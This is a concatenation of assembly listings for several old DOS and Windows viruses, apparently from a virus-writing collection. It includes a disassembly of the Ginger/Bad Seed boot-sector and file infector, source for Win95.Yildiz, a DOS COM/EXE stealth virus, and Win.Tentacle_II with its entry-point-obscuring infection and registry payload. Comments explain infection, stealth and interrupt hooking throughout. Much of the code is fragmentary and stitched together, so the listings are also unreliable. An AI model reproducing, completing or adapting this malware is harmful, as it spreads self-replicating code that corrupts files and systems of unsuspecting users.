Find_FN_FCB ENDS
Find_FN_Dir STRUC
Dir_Reserved DB 21 DUP(0)
Dir_Attr DB 0
Dir_Time DW 0
Dir_Date DW 0
Dir_Size DW 0, 0
Dir_Name DB 13 DUP(0)
Find_FN_Dir ENDS
END Init_Virus
; Bad Seed (Ginger.2782) disasm.
; Multipartite full-stealth MBS/COM/EXE.
; Quite a good virus for it's time (1992), yet the coding style could be
; made more compact, and it's buggy aswell.
; Bugs marked with '***'.
; T-2000/IR, February 2000 - September 2000.
.MODEL TINY
.CODE
START:
CALL File_Entry
EXE_Data:
EXE_SP DW 0
EXE_SS DW 0
EXE_IP DW 0
EXE_CS DW 0
File_Entry:
XCHG BP, AX ; Save AX (FCB-status) in BP.
PUSH CS
POP DS
CLD
XOR DI, DI
Find_ComSpec: PUSH SI
PUSHF
POPF
JE Save_ComSpec ; Yeah got it..
POP SI
PUSH CS
POP DS
MOV [SI+(ComSpec_Length-Boot_Loader)], CL
PUSH SI
POP SI
Hook_Ints: CLI
MOV AX, CS
XCHG DS:[(08h*4)+2], AX
STOSW
MOV AX, ES
XCHG DS:[(21h*4)+2], AX
STOSW
XCHG BX, AX
STOSW
MOV AX, CS
XCHG DS:[(01h*4)+2], AX
STOSW
STI
Save_Int13h: PUSH DS
LDS BX, DS:[(13h*4)] ; Get (tunneled) INT 13h.
MOV AX, DS
STOSW
POP DS
POP ES
Pick_i13h_ISR: POP DS
PUSH SI
PUSHF
; Stealth ISR.
JNE Hook_Int13h
; Stealth/infection ISR.
POPF
POP SI
PUSH CS
POP DS
PUSH ES
PUSH CS
POP ES
MOV AX, 0201h ; Read the MBS of HDD 1.
LEA BX, CS:[SI+(Buffer-Boot_Loader)]
MOV CX, 1
MOV DX, 80h
INT 03h
POP ES
Find_Act_Part: TEST BYTE PTR [BX+DI], 80h ; It's the active partition?
JNZ Chk_Partition
POP ES
Run_Old_Boot:
XOR CX, CX ; Zero ES.
MOV ES, CX
ADD CS:[SI+(EXE_CS-Boot_Loader)], DX
ADD DX, CS:[SI+(EXE_SS-Boot_Loader)]
MOV SS, DX
MOV SP, CS:[SI+(EXE_SP-Boot_Loader)]
MOV ES:[600h+(Act_Partition-File_Int21h)], DI
MOV DS:[SI+(Act_Partition-Boot_Loader)], DI
MOV [SI+(Original_Word-Boot_Loader)], AX
PUSH CS
POP ES
PUSH SI
CLD
CLI
Restore_Int03h: POP SI
PUSH SI
PUSH CS
POP DS
STI
POP SI
JMP Run_Host
POPF
New_Int01h: CLI
PUSH DS
PUSH ES
PUSH DI
CALL Get_Delta_1
Old_Int03h DW 0, 0
PUSH CS
POP ES
CLD
XCHG BX, AX
XCHG DS:[(03h*4)+2], AX
STOSW
PUSH DS ; ES = IVT.
POP ES
PUSH SI
POP SI
POP DI
POP ES
POP DS
IRET
ComSpec_String DB 'COMSPEC='
ComSpec_Value DB 13 DUP (0)
ComSpec_Length DW 0
New_Int08h:
PUSH DS
PUSH AX
PUSH ES
PUSH SI
PUSH DI
PUSH CS
POP ES
MOV AX, CS
MOV DI, OFFSET Old_Int21h+2
NOP
STI
POP DI
POP SI
POP ES
Exit_Int08h: POP AX
POP DS
Boot_Int21h:
PUSH DS
PUSH AX
Exit_No_Debug: POP AX
POP DS
PUSH ES
PUSH AX
PUSH BX
MOV ES, BX
PUSH AX
POP AX
Exit_FCB_St: POP BX
POP AX
POP ES
IRET_FCB_St: IRET
PUSH BX
PUSH DX
Save_Handle: PUSH BX
PUSH ES
PUSH AX
PUSH CX
PUSH SI
PUSH DI
PUSH DS
POP ES
STD
MOV SI, DI
JNE Do_Open_Create
Do_Open_Create: POP DI
POP SI
POP CX
POP AX
POP ES
POP BX
POP DX
PUSH AX
PUSH CX
PUSH DX
POP DX
POP CX
XCHG BX, AX
JNE Save_Inf_Hand
JMP JMP_Old_Int21h
Get_End_DX:
MOV DI, DX
RETN
Do_Infect:
PUSH ES
PUSH BX
PUSH CX
PUSH SI
PUSH DI
PUSH DS
PUSH DX
PUSH DS
POP ES
PUSH AX
CALL Get_End_DX
PUSH CS
POP DS
PUSH DI
XCHG SI, DI
XCHG SI, DI
LOOP Comp_ComSpec
XCHG BX, AX
LOOP Get_Extension
RETN
Exit_Check_Ext: RETN
POP AX ; AX on entry.
PUSH AX
POPF
JE Find_File_Name
JMP Exit_Infect
DB 'CHKDSK', 0
Windows_Active = BYTE PTR $-1
DB 'MEM'
Mem_String = $-1
Go_Chk_Win_Act: POPF
JNE Check_Windows
XCHG SI, DI
LOOP Chk_Start_Name
JNE Chk_File_Name
MOV DX, SI
XCHG SI, DI
XCHG SI, DI
LOOP Compare_Byte
PUSH CS
POP ES
CLD
CLI
MOV AX, CS
XCHG DS:[(12h*4)+2], AX
STOSW
STI
JMP SHORT Check_Windows
CLI
STI
PUSH DS
POP BP
PUSH DS
PUSH DX
POP DX
POP CX
Restore_Int24h: POP DS
POP BX
POP AX
RETN
Infect_Handle:
PUSH CS
POP DS
PUSH DS ; ES = CS.
POP ES
MOV [SI+(EXE_SP-EXE_Data)], ES
MOV [SI+(EXE_SS-EXE_Data)], AX
MOV [SI+(EXE_IP-EXE_Data)], AX
MOV [SI+(EXE_CS-EXE_Data)], ES
MOV [DI+(Host_Size-Buffer)], AX
MOV [DI+(Host_Size-Buffer)+2], DX
Exit_Inf_Hand: RETN
Check_Header: PUSH DI
MOV CX, 9
XOR DX, DX
MOV CX, 4
PUSH DI
MOV SI, [DI.Header_Size]
XOR DI, DI
POP DI
MOV [DI.Program_IP], AX
MOV [DI.Program_CS], DX
MOV [DI.Program_SP], AX
MOV [DI.Program_SS], DX
MOV [DI.Image_Mod_512], AX
POP AX
ADD [DI.File_512_Pages], AX
MOV DX, OFFSET Buffer
NOP
MOV CX, 24 ; Write 24 bytes (MZ-header).
JMP SHORT Write_Header
PUSH DS
POP ES
Bad_Exit: STC
Good_Exit: RETN
PUSH DS
PUSH ES
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
Exit_Infect_3E: POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POP ES
POP DS
JMP IRET_Flags
Go_Check_Secs:
PUSH ES
PUSH AX
PUSH BX
PUSH CX
PUSH DX
PUSH SI
PUSH DI
CALL Check_60_Secs
Exit_Go_Chk_Se: POP DI
POP SI
POP DX
POP CX
POP BX
POP AX
POP ES
JE Stealth_Handle
JMP JMP_Old_Int21h
Check_60_Secs:
MOV AL, CL
XOR AL, CL
RETN
Stealth_Handle:
PUSH DS
PUSH DX
PUSH CX
PUSH AX
PUSH CS
POP DS
XOR CX, CX
MOV New_Read_Count, CX
POP AX
POP DS
PUSH CX
POP CX
JMP IRET_Flags
Rest_File_Pos: PUSH AX
POP BP
PUSH CS
POP DS
PUSH AX
PUSH CX
POP CX
POP AX
POP CX
POP CX
MOV AX, CX ; AX = 0.
JZ Exit_Stealth_1
Error_St_Exit: POP DX
POP DX
Exit_Stealth_1: POP DX
POP DS
JMP IRET_Flags
POP AX
POP CX
MOV CX, -1
SUB CX, New_Read_Count
Do_Function: POP AX
POP CX
POP DX
POP DS
PUSH CX
PUSH AX
PUSH DX
POP DX
POP CX
PUSH AX
PUSH DX
INC AL ; AX = 5701h.
OR CL, (62/2) ; Set 60 seconds.
DEC CX
CALL Do_Old_Int21h
POP DX
POP AX
Exit_Stealth_2: POP CX
JMP IRET_Flags
Clean_Handle:
MOV WORD PTR Valid_Handle, 0001h
MOV File_Handle, BL
POP AX
POP CX
POP DX
POP DS
Check_Win_Exit:
POP BX ; Remove return IP off stack.
POP CX ; POP program's return CS.
PUSH CX
PUSH BX
PUSH AX
POP AX
Stealth_Seconds:
PUSH AX
PUSH CX
PUSH DX
PUSH AX
PUSH CX
POP CX
POP AX
POP DX
POP CX
POP AX
RETN
; This ISR stealths the first INT 12h and then unhooks itself, this way
; MEM and CHKDSK will report the untouched total DOS memory size.
New_Int12h:
PUSH DS
PUSH ES
PUSH BX
POP BX
POP ES
POP DS
IRET
DB '10/23/92', 0
Origin = BYTE PTR $-1
File_Int21h:
CMP AX, 0EEE7h ; Residency check?
JE Return_ID_2
Act_Partition DW 0
Boot_Int13h:
CMP DX, 80h ; 1st HD - head zero?
JNE JMP_Boot_i13h
PUSH SI
Do_Read_Write: PUSH AX
POP AX
CALL Get_Act_Partition
CMP AL, 1
JE Success_IRET
PUSH AX
PUSH CX
PUSH DX
PUSH DI
XOR AH, AH
CMP CX, 1
MOV CX, 512
JNE Calc_Sec_Size
OR DX, DX
JZ Clear_Buffer
MOV CX, 0
CLD
Clear_Byte: STOSB
LOOP Clear_Byte
POP DI
POP DX
POP CX
POP AX
IRET_Flags: PUSH AX
LAHF
PUSH BP
MOV BP, SP
POP BP
POP AX
IRET
CALL Get_Delta_2
Get_Delta_2: POP SI
SUB SI, OFFSET Get_Delta_2
RETN
End_Body:
EXE_Header STRUC
EXE_ID DW 0
Image_Mod_512 DW 0
File_512_Pages DW 0
Reloc_Items DW 0
Header_Size DW 0
Min_Size_Mem DW 0
Max_Size_Mem DW 0
Program_SS DW 0
Program_SP DW 0
Checksum DW 0
Program_IP DW 0
Program_CS DW 0
Reloc_Table DW 0
EXE_Header ENDS
Find_FN_FCB STRUC
FCB_Drive DB 0
FCB_Name DB 8 DUP(0)
FCB_Ext DB 3 DUP(0)
FCB_Attr DB 0
FCB_Reserved DB 10 DUP(0)
FCB_Time DW 0
FCB_Date DW 0
FCB_Start_Clust DW 0
FCB_Size DW 0, 0
Find_FN_FCB ENDS
END START
; *************************************************************************
; ******************** ********************
; ******************** Win95.Yildiz ********************
; ******************** by ********************
; ******************** Black Jack ********************
; ******************** ********************
; *************************************************************************
;
;
;NAME: Win95.Yildiz
;AUTHOR: Black Jack [independant Austrian Win32asm virus coder]
;CONTACT: Black_Jack_VX@hotmail.com | http://www.coderz.net/blackjack
;TYPE: Win9x direct acting/global ring3 resident PE header cavity virus
;SIZE: 323 bytes (but of course infected files won't increase in size)
;
;DESCRIPTION: When an infected file is run, the virus takes control. It then
; tries to find the kernel32 base address by a simple algorithm
; which should make it compatible with Win9X and WinME (although I
; haven't tested it with the second one). After that it gets the
; undocumented Win9X API VxDCall0 and uses it to call int 21h. The
; VxDCall0 API is the very first exported API in Win9X; I don't
; know which API is first in WinNT, that's why unpredictable
; results may occur when the virus runs in that OS (I haven't tried
; it out, but of course the virus can't work in NT).
; Then it goes TSR (read more about this a bit later), and infects
; all PE EXE files in the current directory by overwriting the
; unused padding bytes in the PE header with the virus body.
; The memory residency consist in infecting kernel32.dll in memory.
; To do so, it creates a temporary file called "Yildiz." and writes
; the first 4KB of kernel32.dll there. Then this file is infected
; like any other PE file. And finally the content of the infected
; temp file is read back into kernel32 memory. Yep, you have read
; right, by using the int21h with VxDCall0 you can read from a file
; into read-only memory! (This trick was discovered by Murkry/IkX,
; read more about it in the comments to his Darkside virus source,
; published in Xine#3).
; As I have already said, the kernel32 is infected in memory just
; like any other file, this means the entry point is set to the
; virus, no APIs are hooked. As you should know, the entry point
; of a DLL is a init routine that is called whenever the DLL is
; loaded by a program. And since kernel32 is imported by all
; programs, this means for us that whenever a program is run (and
; kernel32 is mapped into the program's address space), our virus
; will infect all PE EXE files in the directory of the program.
;
;ASSEMBLE WITH:
; tasm32 /mx /m yildiz.asm
; tlink32 /Tpe /aa yildiz.obj,,, import32.lib
;
; there's no need for PEWRSEC or a similar tool, because the
; virus code is supposed to run in read-only memory anyways.
;
;DISCLAIMER: I do *NOT* support the spreading of viruses in the wild.
; Therefore, this source was only written for research and
; education. Please do not spread it. The author can't be hold
; responsible for what you decide to do with this source.
; ===========================================================================
.code
virus_start:
pushad ; save all registers
search_kernel32:
xor ax,ax ; we assume the least significant
; word of the kernel32 base is zero
cmp word ptr [eax], "ZM" ; is there a MZ header ?
JE found_kernel32 ; if yes, we found the correct
; kernel32 base address
dec eax ; 0BFF80000->0BFF7FFFF, and then the
; least significant word is zeroed
JMP search_kernel32 ; check next possible kernel32 base
tmp_filename db "Yildiz", 0
filespec db "*.EXE", 0
found_kernel32:
mov ebx, [eax+3Ch] ; EBX=kernel32 PE header RVA
add ebx, eax ; EBX=offset of kernel32 PE header
findfile_loop:
call ebp ; call our int 21h procedure
JC all_done ; no more files found?
mov ax, 3D02h ; open victim file for read and write
lea edx, [esi.dta+1Eh] ; DS:EDX=pointer to filename in DTA
call ebp ; call our int 21h procedure
search_on:
mov ah, 4Fh ; find next file
JMP findfile_loop
all_done:
pop edx ; restore old DTA offset in DS:EDX
pop ds
mov ah, 1Ah ; reset DTA to old address
call ebp ; call our int 21h procedure
push es ; DS=ES (standart data segment)
pop ds
add esp, size stack_frame ; remove our data buffer from stack
exit_infect:
pop edi ; restore EDI (delta offset)
RET ; return to caller
infect:
push edi ; save EDI (delta offset)
write_file:
mov ah, 40h ; write to file
read_write:
xor ecx, ecx ; ECX=0
pushad ; save all registers
virus_end:
stack_frame struc
buffer db 4096 dup(?)
dta db 43 dup(?)
VxDCall0 dd ?
stack_frame ends
host:
push 0
push offset caption
push offset message
push 0
call MessageBoxA
push 0
call ExitProcess
end virus_start
comment \
Description:
When an infected file is executed, the virus gains control and goes TSR by
the standart MCB method and hooks int21h. It then infects COM and EXE files
when they are executed or loaded by function 4Bh. The infection process is
100% standart. Date, Time and Attributes are stored (except that the seconds
filed holds the infection mark 60), and a dummy int24h is installed during
infection. Also, the virus uses size stealth for FCB (functions 11h, 12h)
handle (functions 4Eh, 4Fh) and Win95 (functions 714Eh, 714Fh), although
the handle stealth won't work because of lots of bugs. Also it has a kind
of time-stealth, on the get time function (5700h) it returns the seconds
field of the last infected file to hide its infection mark.
Comments:
This is just a stupid and boring DOS virus, I just disassembled it because
of great boredom and because I had found an infected file on my mothers PC
(but please don't ask me how it came there). Its full of bugs and rubbish.
TASM /M cu
TLINK /t cu
.model tiny
.286
.code
org 100h
start:
nop ; dummy host
nop
nop
v_start:
push es ; save PSP segment
push cs ; DS=CS
pop ds
xor di,di ; DI=0
lea si,[bp+v_start] ; SI=start of virus code
mov cx,virus_size ; CX=size of virus
cld ; clear direction flag
rep movsb ; copy virus to TSR location
already_resident:
pop es ; ES=PSP segment
push cs ; DS=CS
pop ds
restore_com:
lea si,[bp+header] ; original first bytes of host
mov di,100h
cld ; clear direction flag
movsw ; move start of host back
movsb
restore_exe:
mov ax,es ; AX=ES=PSP segment
add ax,10h ; AX=start segment of image
push es ; DS=ES=PSP segment
pop ds
add word ptr cs:[bp+host_cs],ax ; relocate jump to host
add ax,word ptr cs:[bp+host_ss] ; relocate host SS
mov ss,ax ; restore host SS
mov sp,word ptr cs:[bp+host_sp] ; restore host SP
host_ss dw ?
host_sp dw ?
int21h_handler:
cmp ax,1818h ; residency check
jne no_residency_check
mov bx,0C001h ; we're already installed
iret ; quit interrupt execution
no_residency_check:
cmp ah,4Bh ; load/execute file
jne no_exec
jmp infect
no_exec:
cmp ah,11h ; FCB find first file?
je fcb_stealth
cmp ah,12h ; FCB find next file?
je fcb_stealth
no_LFN_stealth:
cmp ax,5700h ; get file date/time?
jne org_int21h ; Jump if not equal
jmp time_stealth
org_int21h:
db 0EAh
int21h_pointer equ this dword
int21h_offset dw ?
int21h_segment dw ?
push es ; DS:BX=DTA
pop ds
cwd ; DX=0
exit_fcb_stealth:
pop es ; restore setment registers
pop ds
popa ; restore all regs
popf ; restore flags
retf 2 ; return from INT and keep the flags
handle_stealth:
pushf ; push flags
call dword ptr cs:[int21h_pointer-v_start]
jc findfirstnext_failed
pushf ; save flags
pusha ; save all registers
push ds ; save segment registers
push es
push di ; save DI (useless)
handle_stealth_no_com:
cmp ax,"XE" ; could it be an EXE file?
jne exit_handle_stealth ; no EXE/COM, leave stealth routine
cmp cl,"E" ; really an EXE?
jne exit_handle_stealth ; no EXE/COM, leave stealth routine
do_handle_stealth:
sub word ptr es:[bx+1Ah],virus_size ; fixup filesize
; BUG! hiword of filesize unchanged!!!
exit_handle_stealth:
pop di ; restore DI
pop es ; restore segment registers
pop ds
popa ; restore all registers
popf ; restore flags
findfirstnext_failed:
retf 2 ; return from INT and keep the flags
dos_datetime_format:
mov cx,es:[di+14h] ; get filetime in CX
filetime_in_CX:
and cl,00011111b ; CL=file seconds
cmp cl,1Dh ; seconds=60 means infected
jne exit_lfn_stealth ; if not, exit stealth routine
nop
nop
lfn_stealth_no_com:
cmp ax,"XE" ; could it be an EXE file?
jne exit_lfn_stealth ; if not, leave stealth routine.
nop
nop
cmp cl,"E" ; is it really an EXE?
jne exit_lfn_stealth ; no COM/EXE, leave stealth routine
nop
nop
do_lfn_stealth:
sub word ptr es:[di+20h],virus_size ; fixup filesize
sbb word ptr es:[di+22h],0
exit_lfn_stealth:
pop es ; restore segment registers
pop ds
popa ; restore all registers
popf ; restore flags
retf 2 ; return from INT and keep the flags
; ----- GET THE FILE EXTENSION ----------------------------------------------
get_extension:
lodsb ; get a char from filename
cmp al,"." ; end of filename?
jne get_extension ; if not, search on
get_attributes_ok:
mov ax,3D02h ; open file r/w
int 21h ; DS:DX=filename ptr
jnc openfile_ok
jmp reset_attributes
openfile_ok:
xchg bx,ax ; filehandle to BX
push cs ; DS=ES=CS
push cs
pop ds
pop es
infect_com:
mov ax,4202h ; goto end of file
xor cx,cx ; CX:DX=0=distance to move
cwd
int 21h
new_jmp:
db 0E9h
jmp_distance dw ?
infect_exe:
cmp word ptr cs:[header-v_start+18h],40h ; Relo table address
jb no_new_exe
jmp restore_filetime ; don't take New EXEs
no_new_exe:
cmp word ptr cs:[header-v_start+1Ah],0 ; Overlay number
je no_overlay
jmp restore_filetime ; don't take overlays
no_overlay:
cmp word ptr cs:[header-v_start+12h],"UC" ; CRC/infection mark
jne not_infected_yet
jmp restore_filetime ; don't reinfect
not_infected_yet:
mov word ptr cs:[host_type-v_start],"XE" ; mark host as EXE
int24h_handler:
iret ; Interrupt return
int24h_offset dw ?
int24h_segment dw ?
restore_filetime:
pop dx ; restore old file date in DX
pop cx ; restore old file time in CX
set_filetime:
mov ax,5701h ; set file time/date
int 21h
reset_attributes:
pop cx ; restore old file attributes
pop ds ; restore pointer to filename
pop dx ; in DS:DX
mov ax,4301h ; set file attributes funct.
int 21h
end start
comment %
Name : Win.Tentacle_II
Alias : Shell
Author : ?
Type : direct acting Win16 NE appender
Size : 10608 bytes virus body (because of relocation stuff
infected files increase for at least 10634 bytes)
Origin : ?
When : 1996
Status : was in the wild (distributed in sex newsgroups in 1996)
Disassembled by : Black Jack
Contact me : Black_Jack_VX@hotmail.com | http://www.coderz.net/blackjack
Description:
When the virus gets activated, it starts to search and infect NE EXE files,
first one *.EXE file in the current directory, then two in the C:\WINDOWS
directory, then one in some other possible hardcoded windows directories
(C:\WIN, C:\WIN31, C:\WIN311, C:\WIN95), and then one *.SCR file in the
current dir. While infection the virus creates a temporary file
C:\TENTACLE.$$$ and rebuilds there an infected image of the victim file. When
the infection process is finished this file is copied back over the victim
file and then deleted.
The infection technique is adding another segment with the virus
code at the end of the file. To add its own entry to the segment table, it
checks if there is enough unused room between the end of the NE header tables
and the start of the first segment and aborts infection if not. Then it
shifts back all tables after the segment table (therefore overwriting the
unused fill bytes) and fixes their offsets in the NE header, so that it can
write its own segment descriptor at the end of the segment table. In a similar
way it adds its own entries to the module-reference and the imported-names
table (this is necessary to import two APIs that are used in the payload).
The most interesting feature of the virus is that it was one of the first (if
not the very first) viruses using EPO techniques, that means infecting the
file without modifying its entry point. To do so, it searches the code segment
that contains the entry point for a call to the INITTASK API from KERNEL.DLL,
or, if that one is not found, the THUNRTMAIN API from VBRUN300.DLL, this are
APIs that should be in the very beginning of a program. Then the relocation
item that is associated with the API call is patched in such a way that this
call is redirected to the virus.
While infecting, the virus pays special attention to the WINHELP.EXE files.
This file contains a self-check in Win3.11. And that's why the virus patches
it in a special way, so that this self-check is disabled.
The payload is activated if the virus is run between 1:00am and 1:05am - The
virus drops a file C:\TENTACLE.GIF containing a picture of the violet tentacle
from the classical computer game "the day of the tentacle" and modifies the
registry in such a way that whenever the program associated with .GIF files
is run to view such a file it displays the file dropped by the virus. To do so
it uses two imported APIs RegSetValue and RegQueryValue from SHELL.DLL.
Additionally, if the virus is executed between 1:15am and 2:00am it runs the
opposite effect and undoes the changes in the registry that were done in the
payload.
TASM /M tenta2
TLINK tenta2
first generation sample is a DOS EXE file and infects all suitable EXE files
in the current directory only.
%
virus_size EQU (offset virus_end - offset virus_start)
.model tiny
.code
.386
org 0
virus_start:
segm_offset dw 0
segm_phys_size dw virus_size
segm_attribs dw 0001110101010000b ; readable code segment with relocs
segm_virt_size dw virus_size
reloc_stuff:
dd 0000FFFFh ; pointers that will become relocated
dd 0000FFFFh ; must be initialised by 0000:FFFF
dd 0000FFFFh
virus_entry:
push ds ; save DS
pusha ; save all registers
push ss ; DS=SS
pop ds
mov bx,1
mov cx,offset empty_string
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in current dir
mov bx,2
mov cx,offset C_windows
mov dx,offset exe_wildcard
CALL infect_directory ; infect two EXE files in C:\WINDOWS
mov bx,1
mov cx,offset C_win
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in C:\WIN
mov bx,1
mov cx,offset C_win31
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in C:\WIN31
mov bx,1
mov cx,offset C_win311
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in C:\WIN311
mov bx,1
mov cx,offset C_win95
mov dx,offset exe_wildcard
CALL infect_directory ; infect one EXE file in C:\WIN95
mov bx,1
mov cx,offset empty_string
mov dx,offset scr_wildcard
CALL infect_directory ; infect one SCR in current dir
pop ds ; restore DS
restore_host:
add sp,size stack_frame ; free room on stack
C_win db "C:\WIN\", 0
; The following two subroutines are not used in the whole virus. I guess that
; they were just used in the first generation sample, and accidentally left
; in by the virus author. That's why I also used them in the first generation
; carrier of the disassembly.
encrypt_wildcard:
push si ; save SI
push di ; save DI
push es ; save ES
push ds ; ES=DS
pop es
pop es ; restore ES
pop di ; restore DI
encrypt_wildcard_loop:
inc byte ptr [si] ; encrypt one byte from string
inc si ; next byte
loop encrypt_wildcard_loop
pop si ; restore SI
RET
encrypt_path:
push si ; save SI
push di ; save DI
push es ; save ES
push ds ; ES=DS
pop es
pop es ; restore ES
pop di ; restore DI
encrypt_path_loop:
dec byte ptr [si] ; encrypt one byte from string
inc si ; next byte
loop encrypt_path_loop
pop SI ; restore SI
RET
decrypt_path:
cld ; clear direction flag
push di ; save DI
push es ; save ES
push ds ; ES=DS
pop es
pop es ; restore ES
pop di ; restore DI
decrypt_path_loop:
lodsb ; load a byte from source string
inc al ; decrypt it
stosb ; store decrypted byte
loop_decrypt_path:
loop decrypt_path_loop
decrypt_wildcard:
cld ; clear direction flag
push di ; save DI
push es ; save ES
push ds ; ES=DS
pop es
pop es ; restore ES
pop di ; restore DI
decrypt_wildcard_loop:
lodsb ; load a byte from source string
dec al ; decrypt it
stosb ; store decrypted byte
loop_decrypt_wildcard:
loop decrypt_wildcard_loop
C_windows db "C:\WINDOWS\"
empty_string db 0
infect_directory:
push ds ; save DS
push es ; save ES
push cs ; DS=CS
pop ds
push ss ; ES=SS
pop es
mov si,dx
CALL decrypt_wildcard ; decrypt the wilcard to full_filespec
pop es ; restore ES
pop ds ; restore DS
do_file:
push es ; save ES
push di ; save DI
push ss ; ES=SS
pop es
pop di ; restore DI
pop es ; restore ES
push dx ; save DX
pop dx ; restore DX
not_readonly:
CALL infect_file ; infect the file!
JC findnext ; on error while infecting search on!
dec bx ; decrement infection counter
JZ done_directory ; enough files infected?
findnext:
mov ah,4Fh ; find next file
do_file_search:
int 21h ; do the file search
JNC do_file ; if no error happened, process file
done_directory:
RET
C_win31 db "C:\WIN31\", 0
exe_wildcard db "*.EXE", 0
scr_wildcard db "*.SCR", 0
infect_file:
pushad ; save all 32bit registers
CALL get_file_date_time_size
CALL EPO
JC close_tmp_file
mov [bp.module_ordinal],eax ; save module index and ordinal
mov [bp.our_reloc_offs],edx ; save offset of relocation item
xor eax,eax ; EAX=0
mov ax,word ptr [bp.rw_buffer+22h] ; EAX=offset of segment
; descriptor table from NE hdr
add eax,[bp.new_header_offs]; EAX=offset of segment descriptor
; table from file start
; fixup the offsets of the other NE header tables (all are after the segment
; table and therefore shifted back). It is assumed that all tables are in the
; same order in the file as their offsets are stored in the NE header (except
; for the entry table, which should be the second last).
pop ds ; restore DS
JC close_tmp_file
pop ds ; restore DS
JC close_tmp_file
pop ds ; restore DS
JC close_tmp_file
pop ds
JC close_tmp_file
JC delete_tmp_file
mov [bp.source_handle],ax ; save handle
close_tmp_file:
mov bx,[bp.dest_handle] ; BX=handle of temp file
mov ah,3Eh ; close temp file
int 21h
delete_tmp_file:
lea dx,[bp.tmp_filename] ; DS:DX=pointer to temp file name
mov ah,41h ; delete temp file
int 21h
close_file:
mov bx,[bp.source_handle] ; BX=handle of victim file
mov ah,3Eh ; close fictim file
int 21h
exit_infect:
popad ; restore all 32bit registers
RET
C_win311 db "C:\WIN311\", 0
; ----- GET DATE, TIME AND SIZE OF THE OPENED FILE --------------------------
get_file_date_time_size:
push cx ; save CX and DX
push dx
RET
C_win95 db "C:\WIN95\", 0
; ----- COPY ECX BYTES FROM VICTIM FILE TO TEMP FILE ------------------------
copy_file_block:
pushad ; save all 32bit registers
sub sp,256 ; allocate a 256 byte buffer from stack
mov [bp.bytes_to_copy],ecx ; save length of block to copy
mov dx,sp ; DX=offset buffer
copy_file_block_loop:
cmp [bp.bytes_to_copy],0 ; whole block moved?
JE copy_file_block_done ; then we're done
cmp [bp.bytes_to_copy],256 ; more than 256 bytes left?
JBE copy_remaining_bytes_block
mov cx,256 ; then just copy 256 bytes
JMP read_file_block
copy_remaining_bytes_block:
mov cx,word ptr [bp.bytes_to_copy] ; copy all bytes left
read_file_block:
push cx ; save size to read/write
mov bx,[bp.source_handle] ; BX=handle of source file
mov ah,3Fh ; read from file function
push ds ; save DS
push ss ; DS=SS
pop ds
int 21h
pop ds ; restore DS
mov bx,[bp.dest_handle] ; BX=handle of destination file
mov cx,ax ; write as many bytes as were read
mov ah,40h ; write block to temporary file
push ds ; save DS
push ss ; DS=SS
pop ds
int 21h
pop ds ; restore DS
cmp cx,ax ; sizes of read block=written block ?
pop cx ; restore size to read and write
JNZ copy_file_block_error ; if not equal, then an error occured
cmp cx,ax ; size of read/written block equal
; to the size we planned to read?
JNE copy_file_block_done ; if not, we're at the end of the file
copy_file_block_error:
stc ; set carry flag (indicate error)
JMP copy_file_block_ret
copy_file_block_done:
clc ; clear carry flag (indicate success)
add sp,256 ; remove buffer from stack
popad ; restore all 32bit registers
copy_file_block_ret:
RET
search_module_name:
push bx ; save BX
push es ; save ES
push ss ; ES=SS
pop es
search_module_name_loop:
mov si,sp ; SI=buffer on stack
add si,128 ; SI=imported-names table buffer
add si,[bx] ; add offset from module-reference
; table to get a actual entry in the
; imported-names table
JZ found_module_name
inc cx ; incerement CX (module counter)
add bx,2 ; go to next entry in module-
; reference table
check_if_all_modules_done:
cmp cx,word ptr [bp.rw_buffer+1Eh] ; done all modules ?
JNE search_module_name_loop ; if not, search on
JMP module_name_not_found ; if yes, the search failed
found_module_name:
mov ax,cx ; AX=module counter
inc ax ; make counter start from 1
add sp,256 ; remove buffer from stack
clc ; clear carry flag (indicate success)
JMP exit_search_module_name
module_name_not_found:
add sp,256 ; remove buffer from stack
stc ; Set carry flag
exit_search_module_name:
pop es ; restore ES
pop bx ; restore BX
RET
EPO:
check_VBrun:
; create the string 8, "VBRUN300" in tmp_buffer
mov dword ptr [bp.tmp_buffer+4],9062F740h
mov dword ptr [bp.tmp_buffer+0],0EDC4FE68h
mov byte ptr [bp.tmp_buffer+8],"0"
add dword ptr [bp.tmp_buffer+4],9FD05715h
add dword ptr [bp.tmp_buffer+0],647D57A0h
lea dx,[bp.tmp_buffer] ; Load effective addr
CALL search_module_name
JC end_EPO
mov dx,64h ; ordinal of THUNRTMAIN API
search_API_reference:
push ax ; save AX (module index)
push dx ; save DX (API function ordinal)
search_API_reference_loop:
push cx ; save CX
pop cx
JC EPO_failed
found_API_reference:
mov edx,[bp.entry_CS_relocs]
add edx,2
shl ecx,3 ; ECX=ECX*8 (size of a reloc item)
add edx,ecx ; EDX=offset of reloc item in file
mov eax,dword ptr [bp.module_index]; EAX=module index/API ordinal
EPO_failed:
add sp,size EPO_stack_frame ; clear buffer from stack
pop bp
stc ; set carry flag (indicate error)
end_EPO:
RET
gif_body:
include gif.inc ; the body of the gif file converted
; to DB instructions
gif_body_size EQU ($ - offset gif_body)
shell_open_command db "\SHELL\OPEN\COMMAND", 0
l_shell_open_command EQU ($ - offset shell_open_command)
payload:
push es ; save ES
push bp ; save BP (main stack frame pointer)
RegQueryValue_success:
cmp byte ptr [bp.reg_buffer1],0; has it returned an empty string?
JE try_shell_open_command
push ss ; ES=SS
pop es
push ds ; save DS
push cs ; DS=CS
pop ds
try_shell_open_command:
mov word ptr [bp.reg_buffer1],"G."
mov dword ptr [bp.reg_buffer1+2],"FI"
push ds ; save DS
push cs ; DS=CS
pop ds
push ss ; ES=SS
pop es
RegQueryValue_success2:
; reg_buffer2 contains now the commandline of the program that is
; runned whenever the user doubleclics on a .GIF file
push ss ; ES=SS
pop es
lea di,[bp.reg_buffer2] ; DI=pointer to commandline connected
; with .GIF files
push di ; save DI
xor al,al ; AL=0
mov cx,0FFFFh ; CX=maximal word
repne scasb ; search for the end of the string
dec di ; DI points now to the terminating 0
mov ax,di ; AX=end of string
pop di ; restore DI (start of string)
sub ax,di ; AX=length of string
mov cx,ax ; CX=length of string
mov al,"%" ; search the commandline for where
; the name of the gif will be on
; program start
cld ; clear direction flag
repne scasb ; search for the % sign
JNZ exit_payload ; if not found, exit payload
